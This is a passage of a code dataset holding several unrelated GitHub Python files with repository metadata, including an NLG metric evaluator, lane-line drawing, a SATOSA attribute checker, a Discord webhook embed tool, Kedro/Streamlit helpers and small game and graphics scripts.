sum_match[scope] = 0\n counter[scope] = 0\n #mlog.debug(\"&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\")\n gen_token = gen_tokens[lang]\n #Compute embeddings\n top_hyp = str(row[\"pred_text1\"])\n preds = [top_hyp]\n inp = row[\"input_text\"]\n tail = re.sub(r'','',str(row[\"target_text\"]))\n tail = tail.strip()\n tails = [tail]\n all_predictions.append(top_hyp)\n all_golds.append(tails[0])\n hi, ri = 0, 0\n hi, ri, cur_score = bert_score(bert_scorer, preds, tails)\n #summary = bert_score2(bert_metric, preds, tails)\n #cur_score = summary[\"bertscore_f1\"]\n best_hyp = preds[hi]\n best_ref = tails[ri]\n hyp_counter[hi] += 1\n if nli_model:\n pair = (best_hyp, best_ref)\n nli_scores = nli_model.predict(pair) \n _max = nli_scores.argmax()\n label = nli_map[_max]\n nli_counter[label] += 1\n data[\"nli_group\"] = label\n data[\"top\"] = best_ref\n data[\"all_preds\"] = \"
\".join(preds) \n data[\"top_pred\"] = best_hyp\n if \"bert_score\" in df and reval:\n df.at[step, \"bert_score\"] = float(\"{:.2f}\".format(cur_score))\n else:\n data[\"bert_score\"] = float(\"{:.2f}\".format(cur_score))\n sum_bert[scope] += cur_score\n sum_bert[\"all\"] += cur_score\n counter[scope] += 1\n counter[\"all\"] += 1\n mean_bert[scope] = \"{:.4f}\".format(sum_bert[scope] / counter[scope])\n mean_bert[\"all\"] = \"{:.4f}\".format(sum_bert[\"all\"] / counter[\"all\"])\n #### BLUE score\n #tokenized_rs = []\n #for r in tails:\n # tokenized_rs.append(word_tokenize(r))\n #hypo = word_tokenize(top_hyp)\n bleu_score = 0.0\n #try:\n # bleu_score = sentence_bleu(tokenized_rs, hypo, smoothing_function=smoothie)\n #except ValueError: # TODO ZeroDivisionError\n # vlog.warning(\"math domain error in bleu, set to 0.0. generated sentence: {}\".format(hypo))\n data[\"bleu_score\"] = bleu_score \n sum_bleu[scope] += bleu_score \n mean_bleu[scope] = \"{:.4f}\".format(sum_bleu[scope] / counter[scope])\n #### Rouge score\n rouge_score = 0\n m_tails = \".\".join(tails)\n m_top_hyp = top_hyp\n if rel in rel_target_omits:\n omit = rel_target_omits[rel]\n m_top_hyp = top_hyp.replace(omit, \"\") \n m_tails = m_tails.replace(omit,\"\")\n if rouge_scorer and m_top_hyp.strip() and m_tails.strip():\n rouge_score = rouge_scorer.get_scores(m_top_hyp, m_tails, \n avg=True, ignore_empty=True)\n rouge_score = rouge_score[\"rouge-l\"][\"f\"]\n match_score = 0\n inp_key = inp + rel\n mean_match[scope] = \"{:.4f}\".format(sum_match[scope] / counter[scope])\n\n data[\"rouge_score\"] = rouge_score\n sum_rouge[scope] += rouge_score\n sum_rouge[\"all\"] += rouge_score\n mean_rouge[scope] = \"{:.4f}\".format(sum_rouge[scope] / counter[scope])\n mean_rouge_all = sum_rouge[\"all\"] / counter[\"all\"]\n mean_rouge[\"all\"] = \"{:.4f}\".format(mean_rouge_all)\n pbar.set_description(f\"{scope:<20} :Bert:{mean_bert[scope]:<7} | {mean_bert['all']:<7} Rouge {mean_rouge[scope]:<7}|{mean_rouge['all']:<7} \")\n step += 1\n pbar.update()\n rows.append(data)\n\n df2 = pd.DataFrame(rows)\n if \"st\" in scorers:\n sts_data = df2[[\"top\",\"top_pred\"]]\n preds = df2[\"top_pred\"].to_list()\n tails = df2[\"top\"].to_list()\n berts = [0]*len(preds)\n rouges = [0]*len(preds)\n if \"bert\" in scorers:\n berts = df2[\"bert_score\"].to_list()\n if \"rouge\" in scorers:\n rouges = df2[\"rouge_score\"].to_list()\n scores = []\n for batch in np.array_split(sts_data, 10):\n scores.extend(run_sts_benchmark(batch, embed))\n\n df2[\"st_score\"] = [\"{:.2f}\".format(float(x)) for x in scores]\n res = zip(scores, berts, rouges, preds, tails)\n for s, b, r, p, t in res:\n print(\"{:<5.2f} {:<5.2f} {:<5.2f}{:<20} {:<20}\".format(float(s),float(b),float(r),p,t))\n\n print(\"mean st score: %s\", np.mean(scores))\n print(\"mean bert score: %s\", np.mean(berts))\n print(\"mean rouge score: %s\", np.mean(rouges))\n\n if not reval:\n df = pd.concat([df, df2], axis=1)\n\n mlog.info(\"Saving results %s\", save_path)\n save_fname = now + \"_full_results.tsv\"\n if not save_path.endswith(\"tsv\"):\n save_path = os.path.join(save_path, save_fname) \n print(\"Saving results %s\", save_path)\n df.to_csv(save_path, index=False, sep=\"\\t\")\n \n for metric in [mean_rouge, mean_bert, mean_match, mean_bleu]:\n s =0 \n ii = 0\n jj = 0\n for key,val in metric.items():\n metric[key] = str(val) + \"--\" + str(counter[key])\n s += float(val)\n ii += 1\n jj += counter[key]\n metric[\"AVG\"] = \"{:.2f}--{}\".format(s/ii, jj)\n\n mean_bert_str = json.dumps(mean_bert, indent=2)\n mean_rouge_str = json.dumps(mean_rouge, indent=2)\n mean_bleu_str = json.dumps(mean_bleu, indent=2)\n mean_match_str = json.dumps(mean_match, indent=2)\n mlog.info(\"-----------------------------------------------------\")\n pbar.close()\n pred_counts = df['pred_text1'].unique()\n mlog.info(\"Pred counts\")\n vlog.info(\"Pred counts\")\n if len(pred_counts) < 100:\n for r in pred_counts:\n mlog.info(r)\n vlog.info(r)\n\n df_mean_rouge = df[\"rouge_score\"].mean()\n for logger in [mlog, vlog, clog]:\n logger.info(\"Len data frame: {}\".format(len(df)))\n logger.info(\"Rouge:{} \".format(mean_rouge_str)) \n logger.info(\"DF mean Rouge Score: {}\".format(df_mean_rouge))\n if \"bert\" in scorers:\n logger.info(\"BERT:{} \".format(mean_bert_str)) \n logger.info(\"DF mean Bert Score: {}\".format(df[\"bert_score\"].mean()))\n #logger.info(\"nli_counter: {}\".format(nli_counter))\n #logger.info(\"hyp_counter: {}\".format(hyp_counter))\n logger.info(\"Distinct preds:{}\".format(len(pred_counts)))\n\n return df\n\ndef write_results(exp_info, save_path, df): \n _info = \"_\".join([str(x) for x in list(exp_info.values())])\n #metric_list = [\"rouge\", \"meteor\", \"bertscore\"]\n #summary = calc_metrics(all_predictions, all_golds, metric_list)\n summary = \"\"\n out = os.path.join(save_path,f\"summary__{_info}.txt\")\n print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n print(summary)\n with open(out, \"w\") as f:\n print(summary, file=f)\n print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n if not scorers:\n return\n\n\n df = df.sort_values(by=[\"input_text\"])\n \n out = os.path.join(save_path,f\"__{_info}.txt\")\n def write_preds(df, out):\n handler = logging.FileHandler(out, mode=\"w\")\n mlog.addHandler(handler)\n old_input = \"\"\n for i, row in df.iterrows(): \n q = row[\"input_text\"] \n p = row[\"prefix\"]\n if q != old_input:\n old_input = q\n mlog.info(\"\\n\\n\")\n mlog.info(\"\\n\")\n mlog.info(\"{:<2} {} {:<60}:\".format(i, q, p))\n preds = row[\"all_preds\"]\n answers = row[\"target_text\"]\n mlog.info(\"------------------------------------ preds for {}:\".format(p))\n for pred in preds.split(\"
\"):\n mlog.info(\"{:<60}:\".format(pred))\n mlog.info(\"----------------------------------- targets for {}:\".format(p))\n for ans in answers.split(\"
\"):\n mlog.info(\"{:<60}:\".format(ans))\n\n\n\ndef bert_score2(metric, preds, golds):\n summary = {}\n preds = [p.strip() for p in preds]\n golds = [g.strip() for g in golds]\n res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/paraphrase-MiniLM-L6-v2\", num_layers=6)\n #res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/t5-large\", num_layers=24)\n for k, v in res.items():\n if k == \"hashcode\":\n continue\n summary[f\"bertscore_{k}\"] = round(1.0 * sum(v) / len(v), 2)\n return summary\n\n\ndef calc_metrics(preds, golds, metric_list):\n summary = {}\n for metric_name in metric_list:\n metric = load_metric(metric_name)\n processed_preds, processed_golds = postprocess_text(preds, golds, metric_name)\n\n if metric_name == \"bertscore\":\n res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/paraphrase-MiniLM-L6-v2\", num_layers=6)\n for k, v in res.items():\n if k == \"hashcode\":\n continue\n summary[f\"{metric_name}_{k}\"] = round(1.0 * sum(v) / len(v), 2)\n\n else:\n res = metric.compute(predictions=processed_preds, references=processed_golds)\n if metric_name == \"sacrebleu\":\n summary[metric_name] = res[\"score\"] * 0.01 # limit it to range of [0, 1] for unifying\n elif metric_name == \"bleurt\":\n summary[\"bleurt\"] = round(1.0 * sum(res[\"scores\"]) / len(res[\"scores\"]), 2)\n elif metric_name == 'rouge':\n for sub_metric_name in res.keys():\n for i, key in enumerate(['precision', 'recall', 'fmeasure']):\n summary[\"{}_{}\".format(sub_metric_name, key)] = res[sub_metric_name][1][i]\n # this the the fmeasure('f-score') from the mid('mean aggregation')\n else:\n summary[metric_name] = res[metric_name]\n return summary\n\ndef acc_metric(tokenizer, all_preds, all_labels, save_path=\"\"):\n acc = sum([int(p == l) for p, l in zip(all_preds, all_labels)]) / len(all_preds)\n \n if save_path:\n with open(os.path.join(save_path, \"{}.txt\".format(acc)), \"w\") as f:\n for p, l in zip(all_preds, all_labels):\n f.write(str(p) + \"\\t\\t\" + str(l) + \"\\n\")\n if isinstance(p, list):\n f.write(tokenizer.decode(p) + \"\\t\\t\" + tokenizer.decode(l) + \"\\n\")\n f.write(\"\\n\")\n\n return acc\n\n\ndef acc_f1_metric(tokenizer, all_preds, all_labels, save_path=\"\"):\n f1_macro = f1_score(all_labels, all_preds, average=\"macro\")\n acc = sum([int(p == l) for p, l in zip(all_preds, all_labels)]) / len(all_preds)\n\n if save_path:\n with open(os.path.join(save_path, \"{}.txt\".format(f1_macro)), \"w\") as f:\n for p, l in zip(all_preds, all_labels):\n f.write(str(p) + \"\\t\\t\" + str(l) + \"\\n\")\n if isinstance(p, list):\n f.write(tokenizer.decode(p) + \"\\t\\t\" + tokenizer.decode(l) + \"\\n\")\n f.write(\"\\n\")\n\n return [acc, f1_macro]\n\n\nif __name__ == \"__main__\":\n do_score_w()\n","repo_name":"puraminy/mt5-comet","sub_path":"comet/train/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":34931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40885696261","text":"import numpy as np\nimport cv2\nimport lines\n\ndef draw_lane(img, warped_img, left_points, right_points, Minv):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(warped_img).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n left_fitx = left_points[0]\n right_fitx = right_points[0]\n ploty = left_points[1]\n\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0])) \n\n # Combine the result with the original image\n return cv2.addWeighted(img, 1, newwarp, 0.3, 0)\n\ndef add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720): \n # Calculate radius of curvature\n curvature_rads = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,\n xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)\n # Calculate car offset\n offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)\n\n # Display lane curvature\n out_img = img.copy()\n cv2.putText(out_img, 'Left lane line curvature: {:.2f} m'.format(curvature_rads[0]), \n (60, 60), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n cv2.putText(out_img, 'Right lane line curvature: {:.2f} m'.format(curvature_rads[1]), \n (60, 110), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n \n # Display car offset\n cv2.putText(out_img, 'Horizontal car offset: {:.2f} m'.format(offsetx), \n (60, 160), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n \n return out_img","repo_name":"jeremyscatigna/advance_lanelines_finding","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11512074421","text":"# 예제 파일 이름을 pickle.py로 하면 AttributeError 발생 가능\nimport pickle\n\n# pickle 은 파이썬에 특화된 binary_file이다\n\n# pickle write binary\nf = open(\"file_handling/log/list.pickle\", \"wb\")\ntest = [1,2,3,4,5]\npickle.dump(test, f)\nf.close()\n\n# # pickle read binary\nf = open(\"file_handling/log/list.pickle\", \"rb\")\ntest_pickle = pickle.load(f)\nprint(test_pickle)\nf.close()\n","repo_name":"updaun/PythonBasic","sub_path":"file_handling/pickle_example.py","file_name":"pickle_example.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27488242716","text":"import sys\nsys.dont_write_bytecode = True\n\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nimport nltk\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('vader_lexicon')\n\nfrom rasa.utils.endpoints import EndpointConfig\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom rasa.core.http_interpreter import RasaNLUHttpInterpreter\n\nfrom router.router import router\nfrom core.config import settings\nfrom bots import server_dialogflow\nfrom service.loadAllModel import load_all_models\nfrom service.createCustomActionFile import create_file_custom_action\n\ndef get_application() -> FastAPI:\n application = FastAPI()\n application.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n http_interpreter = RasaNLUHttpInterpreter(EndpointConfig(\n url = settings.RASA_BOT_ENDPOINT,\n params = {},\n headers = {\n \"Content-Type\": \"application/json\",\n },\n basic_auth=None,\n ))\n \n application.include_router(router, prefix=settings.API_PREFIX)\n application.include_router(server_dialogflow.router)\n\n # create_file_custom_action()\n # load_all_models()\n \n return application\n\napp = get_application()\nif __name__ == '__main__':\n uvicorn.run(\"main:app\", port=8000, reload = True)\n","repo_name":"Social-Listenning/Social_Listening_Bot","sub_path":"Bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"463389002","text":"from collections import defaultdict\nfrom logging import getLogger as get_logger\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\nfrom jinja2 import select_autoescape\n\nfrom satosa.exception import SATOSAError\nfrom satosa.micro_services.base import ResponseMicroService\nfrom satosa.response import Unauthorized as UnauthorizedResponse\n\n\nlogger = get_logger(__name__)\n\n\nclass AttributeCheckerError(SATOSAError):\n pass\n\n\nclass AttributeChecker(ResponseMicroService):\n def __init__(self, config, internal_attributes, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.state_result = config[\"state_result\"]\n self.attributes_strategy = {'all': all, 'any': any}[config.get(\"attributes_strategy\", \"all\")]\n self.attribute_values_strategy = {'all': all, 'any': any}[config.get(\"attribute_values_strategy\", \"any\")]\n self.user_id_attribute = config[\"user_id_attribute\"]\n\n required_attributes_per_service = {}\n for item in config.get(\"required_attributes_per_service\", []):\n services = item.get(\"services\")\n allowed_attributes = item.get(\"allowed_attributes\")\n if services is None or allowed_attributes is None:\n logger.warning[\"services or allowed_attributes missing\"]\n continue\n for service in services:\n required_attributes = required_attributes_per_service.get(\n service, defaultdict(set)\n )\n for k, v in allowed_attributes.items():\n required_attributes[k].update(v)\n required_attributes_per_service[service] = required_attributes\n\n # the attributes for the \"default\" service are added for all services\n self.default_attributes = dict(\n required_attributes_per_service.get(\"default\", {})\n )\n for k, v in self.default_attributes.items():\n for required_attributes in required_attributes_per_service.values():\n required_attributes[k].update(v)\n\n self.required_attributes_per_service = {\n k: dict(v) for k, v in required_attributes_per_service.items()\n if k != \"default\"\n }\n\n templates_dir_path = config[\"templates_dir_path\"]\n self.tpl_env = Environment(loader=FileSystemLoader(templates_dir_path), autoescape=select_autoescape())\n\n def process(self, context, internal_data):\n try:\n allowed_attributes = self.required_attributes_per_service.get(\n internal_data.requester, self.default_attributes\n )\n if not allowed_attributes:\n raise AttributeCheckerError(\n \"No allowed attributes configured for %s\", internal_data.requester\n )\n return self._process(context, internal_data, allowed_attributes)\n except AttributeCheckerError as e:\n context.state[self.state_result] = False\n context.state.delete = True\n logger.warning(e)\n\n requester = internal_data.requester\n requester_md = internal_data.metadata.get(requester)\n issuer = internal_data.auth_info.issuer\n issuer_md = internal_data.metadata.get(issuer)\n user_id = internal_data.attributes.get(self.user_id_attribute, [None])[0]\n\n template = self.tpl_env.get_template(\"error-access.html.jinja2\")\n content = template.render(\n attrs=internal_data.attributes,\n requester=requester,\n requester_md=requester_md,\n issuer=issuer,\n issuer_md=issuer_md,\n user_id=user_id,\n )\n return UnauthorizedResponse(content)\n\n def _process(self, context, internal_data, allowed_attributes):\n context.state[self.state_result] = False\n is_authorized = self.attributes_strategy(\n self.attribute_values_strategy(\n value in values\n for value in internal_data.attributes.get(attr, [])\n )\n for attr, values in allowed_attributes.items()\n )\n\n if not is_authorized:\n error_context = {\n 'message': 'User is not authorized to access this service.',\n 'allowed_attributes': list(allowed_attributes.keys()),\n 'attributes': internal_data.attributes.keys(),\n 'attributes_strategy': self.attributes_strategy.__name__,\n 'attribute_values_strategy': self.attribute_values_strategy.__name__,\n }\n raise AttributeCheckerError(error_context)\n\n context.state[self.state_result] = True\n return super().process(context, internal_data)\n","repo_name":"SUNET/swamid-satosa","sub_path":"src/swamid_plugins/attributes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5678328034","text":"import requests\r\nprint(\"\"\"\r\n\r\n███████╗███╗░░░███╗██████╗░███████╗██████╗░██╗░░██╗░█████╗░░█████╗░██╗░░██╗\r\n██╔════╝████╗░████║██╔══██╗██╔════╝██╔══██╗██║░░██║██╔══██╗██╔══██╗██║░██╔╝\r\n█████╗░░██╔████╔██║██████╦╝█████╗░░██║░░██║███████║██║░░██║██║░░██║█████═╝░\r\n██╔══╝░░██║╚██╔╝██║██╔══██╗██╔══╝░░██║░░██║██╔══██║██║░░██║██║░░██║██╔═██╗░\r\n███████╗██║░╚═╝░██║██████╦╝███████╗██████╔╝██║░░██║╚█████╔╝╚█████╔╝██║░╚██╗\r\n╚══════╝╚═╝░░░░░╚═╝╚═════╝░╚══════╝╚═════╝░╚═╝░░╚═╝░╚════╝░░╚════╝░╚═╝░░╚═╝ \r\n\r\n\"\"\")\r\nurl = input(\"URL of the WebHook: \")\r\nembed = {}\r\nembedtitle = input(\"Embed Title: \")\r\nembed[\"title\"] = embedtitle\r\nembeddesc = input(\"Embed Description: \")\r\nembed[\"description\"] = embeddesc\r\nwhile True: #Thumbnail (optional)\r\n thumbnailornot = input(\"Willing to add an image? (S/n): \")\r\n if thumbnailornot.lower() == 's':\r\n embedthumbnailurl = input(\"URL Of the Image: \")\r\n embed['thumbnail'] = {\"url\": embedthumbnailurl}\r\n break\r\n elif thumbnailornot.lower() == 'n':\r\n break\r\n else:\r\n print(\"Please select a valid option; 'S' or 'n' :\")\r\nembedfieldnum = input(\"How many fields for your embed? (Put a number, 0 for none): \")\r\ntry: embedfieldnum = int(embedfieldnum)\r\nexcept: print(\"You were supposed to put a number, we will assume you meant 0\")\r\nif embedfieldnum is not 0:\r\n embed['fields'] = []\r\n for fieldnum in range(embedfieldnum):\r\n fieldtitle = input(\"Campo {} Titulo: \".format(fieldnum+1))\r\n fieldtext = input(\"Campo {} Contenido: \".format(fieldnum+1))\r\n embed['fields'].append({\"name\":fieldtitle,\"value\":fieldtext})\r\nembedcolor = input(\"Hex Color of the Embed (6 Digits): \")\r\nembedcolor = int(embedcolor, 16)\r\nembed[\"color\"] = embedcolor\r\nprint(embed)\r\ndata = {\"embeds\": [embed]}\r\nrequests.post(url,json=data)\r\n","repo_name":"5R7/EmbedHook","sub_path":"EmbedHook.py","file_name":"EmbedHook.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29183851938","text":"#!/usr/bin/python\n# coding:utf-8\nimport ctypes\nfrom ctypes import *\nimport os\n\n\"\"\"\n使用ctypes直接调用动态链接库,没测试过python3\n\"\"\"\n\n# 参数为生成的.so文件所在的绝对路径\nlibtest = ctypes.cdll.LoadLibrary(os.getcwd() + '/linuxany.so')\n# 如果参数是char* 或者int 可以直接调用\nprint(libtest.display('Hello,I am linuxany.com'))\n\n# 如果参数是其他类型,先设置参数类型,在申请好空间传参调用\nmyGetData = libtest.getData\npData = ctypes.POINTER(ctypes.c_ubyte)\nmyGetData.argtypes = [pData]\nbuffersize = 1024 * 1024 * 20\n# 这个是申请空间\ndata = (buffersize * ctypes.c_ubyte)()\n# 完成调用\nmyGetData(data)\n\nprint(type(data))\nprint(data[0])\n# 类型转换\nstrData = string_at(data, buffersize)\nprint(len(strData))\n","repo_name":"uncleheart/PublicFunction","sub_path":"python/system/Library/linuxsotest.py","file_name":"linuxsotest.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6686499561","text":"def setup():\n size(1024, 768)\n background(89, 91, 92)\n frameRate(10)\n\na = 100\nb = 50\ntheta = 0\nangle = 0\nz = 100\n\ndef draw():\n triangleVersion()\n \ndef triangleVersion():\n global angle, z\n stroke(233, 240, 170)\n strokeWeight(0.1)\n noFill()\n translate(width/2, height/2)\n scale(4, -4)\n rotate(angle)\n triangle(-z, 0, z, 0, 1/2*z, z)\n z = sqrt(3)*z/2\n angle = angle + atan(1/sqrt(3))\n \ndef rectangleVersion():\n frameRate(5)\n global theta, a, b\n stroke(233, 240, 170)\n fill(233, 240, 170, 3)\n translate(width/2, height/2)\n scale(1, -1)\n rotate(theta)\n strokeWeight(4)\n point(a, 0)\n point(0, b)\n strokeWeight(1)\n rect(0, 0, a, b)\n a = sqrt(a**2 + b**2)\n theta = theta + atan(b/a)\n s = (b**2)/a\n b = sqrt(b**2 - s**2)\n","repo_name":"fcrb/ProcessingGit","sub_path":"Processing2/jamiesFractalPython/jamiesFractalPython.pyde","file_name":"jamiesFractalPython.pyde","file_ext":"pyde","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10636718952","text":"import pygame\nfrom .logger import logger as log \nfrom .screens import MenuScreen, GameScreen\nfrom .tools import TextDisplayer\n\nclass Game:\n \n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"Morpion\")\n self.DISPLAY_SIZE = (600, 600)\n self.display = pygame.display.set_mode(self.DISPLAY_SIZE)\n self.clock = pygame.time.Clock()\n self.running = False\n self.textDisplayer = TextDisplayer(self)\n\n self.current_screen = \"main_screen\"\n\n self.screens = {\n \"main_screen\": MenuScreen(self),\n \"game_screen\": GameScreen(self)\n }\n\n self.params = {\n \"player1\": \"X\",\n \"player2\": \"O\",\n \"player1_name\": \"Player 1\",\n \"player2_name\": \"Player 2\",\n \"typePlayer1\": \"human\",\n \"typePlayer2\": \"human\",\n \"AI_method\": \"easy\" # easy, mimax, minimax_alpha_beta, complex\n }\n\n log.info(\"Game initialized\")\n\n\n \n def setScreen(self, screen_name):\n if screen_name in self.screens:\n self.current_screen = screen_name\n else:\n log.error(f\"Screen {screen_name} doesn't exist\")\n \n \n def run(self):\n self.running = True\n log.debug(\"funct Game.run() called\")\n \n\n while self.running:\n events = pygame.event.get()\n\n self.screens[self.current_screen].update(events)\n self.display.blit(self.screens[self.current_screen], (0,0))\n pygame.display.update()\n\n for event in events:\n if event.type == pygame.QUIT:\n log.info(\"Game closed\")\n self.running = False\n pygame.quit()\n","repo_name":"Sosso8305/TP-learn-AI-tic-tac-toe","sub_path":"morpion/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2478199060","text":"import numpy as np\n\nclass Manager:\n def __init__(self):\n self.person_list = list()\n self.object_list = list()\n self.new_object_list = list()\n\n def add_person(self, _person):\n self.person_list.append(_person)\n\n def get_person(self, _index):\n for person in self.person_list:\n if person.id == _index:\n return person\n return None\n\n def get_object(self, _index):\n for obj in self.object_list:\n if obj.id == _index:\n return obj\n\n for new_obj in self.new_object_list:\n if new_obj.id == _index:\n return new_obj\n return None\n\n def add_object(self, _obj):\n self.new_object_list.append(_obj)\n\n def update(self):\n ## delete person\n for person in self.person_list:\n if person.is_deleted:\n for obj in person.belongings:\n self.object_list.remove(obj)\n self.person_list.remove(person)\n\n ## match objects to person\n if self.new_object_list:\n for _obj in self.new_object_list:\n if self.person_list:\n distance = float(\"inf\")\n target = None\n for person in self.person_list:\n if not person.is_missed:\n temp = calculate_distance(_obj, person)\n if temp < distance:\n distance = temp\n target = person\n if target:\n target.add_object(_obj)\n else:\n _obj.is_abandoned = True\n else:\n _obj.is_abandoned = True\n self.object_list.append(_obj)\n self.new_object_list=list()\n\n\n\n def get_ab_objects(self):\n ab_objects = [obj for obj in self.object_list if obj.is_abandoned]\n return ab_objects\n\n\ndef calculate_distance(_object, _person):\n obj_cen = np.array([(_object.location[0] + _object.location[2])/2, (_object.location[1] + _object.location[3])/2])\n per_cen = np.array([(_person.location[0] + _person.location[2])/2, (_person.location[1] + _person.location[3])/2])\n distance = np.sqrt(np.sum(np.square(obj_cen - per_cen)))\n return distance","repo_name":"jerry-ljy/Abandoned_Object_Detection","sub_path":"ab_detector/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"8892950599","text":"import logging\nimport os\nimport sys\nfrom functools import wraps\n\nimport streamlit as st # noqa: I201\nfrom kedro.config import ConfigLoader # noqa: I201,I100\nfrom kedro.framework.context import KedroContext\nfrom kedro.framework.hooks import _create_hook_manager\nfrom kedro.framework.startup import bootstrap_project\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_project_dir() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"project_dir\"]\n\n\ndef get_project_conf_dir() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"project_conf_dir\"]\n\n\ndef get_package_name() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"package_name\"]\n\n\ndef create_config(project_dir: str):\n if \"kedro\" in st.session_state:\n logger.warning(\"Kedro session already initiated and will be overwritten\")\n logger.info(f\"Kedro session initiated at {project_dir}\")\n st.session_state[\"kedro\"] = {}\n st.session_state[\"kedro\"][\"config\"] = {}\n st.session_state[\"kedro\"][\"config\"][\"project_dir\"] = project_dir\n st.session_state[\"kedro\"][\"config\"][\"project_conf_dir\"] = project_dir + \"/conf\"\n st.session_state[\"kedro\"][\"config\"][\"package_name\"] = \"pipelines\"\n st.session_state[\"kedro\"][\"pipelines\"] = {}\n\n\ndef bootstrap_kedro_project(project_dir: str | None = None, overwrite=False):\n if \"kedro\" in st.session_state and overwrite is False:\n logger.info(\"Kedro session already initiated\")\n return None\n if project_dir is None:\n project_dir = os.getcwd()\n logger.info(\"Project directory not provided, using current working directory\")\n logger.info(\"Initiating project at: %s\", project_dir)\n if project_dir not in sys.path:\n sys.path.append(project_dir)\n bootstrap_project(project_dir)\n create_config(project_dir)\n\n\ndef load_context():\n project_dir = get_project_dir()\n project_conf_dir = get_project_conf_dir()\n package_name = get_package_name()\n config_loader = ConfigLoader(conf_source=project_conf_dir)\n context = KedroContext(\n package_name=package_name,\n project_path=project_dir,\n config_loader=config_loader,\n hook_manager=_create_hook_manager(),\n )\n return context\n\n\ndef initiate_context():\n context = load_context()\n if \"catalog\" in st.session_state[\"kedro\"]:\n logger.info(\"Kedro catalog already initiated.\")\n else:\n st.session_state[\"kedro\"][\n \"catalog_counter\"\n ] = 0 # useful to force update cashed functions\n st.session_state[\"kedro\"][\"catalog\"] = context.catalog\n if \"parameters\" in st.session_state[\"kedro\"]:\n logger.info(\"Kedro parameters already initiated\")\n else:\n st.session_state[\"kedro\"][\n \"parameters_counter\"\n ] = 0 # useful to force update cashed functions\n st.session_state[\"kedro\"][\"parameters\"] = context.params\n\n\ndef start_kedro_session(project_dir: str | None = None):\n bootstrap_kedro_project(project_dir)\n initiate_context()\n\n\ndef reload_parameters():\n logger.info(\"Reloading Kedro parameters\")\n if \"parameters\" in st.session_state[\"kedro\"]:\n logger.warning(\"Kedro parameters already initiated and will be overwritten\")\n st.session_state[\"kedro\"][\n \"parameters_counter\"\n ] += 1 # useful to force update cashed functions\n context = load_context()\n st.session_state[\"kedro\"][\"parameters\"] = context.params\n\n\ndef reload_catalog():\n logger.info(\"Reloading Kedro parameters\")\n if \"catalog\" in st.session_state[\"kedro\"]:\n logger.warning(\"Kedro catalog already initiated and will be overwritten\")\n st.session_state[\"kedro\"][\n \"catalog_counter\"\n ] += 1 # useful to force update cashed functions\n context = load_context()\n st.session_state[\"kedro\"][\"catalog\"] = context.catalog\n\n\ndef reload_context():\n logger.info(\"Reloading Kedro context\")\n reload_parameters()\n 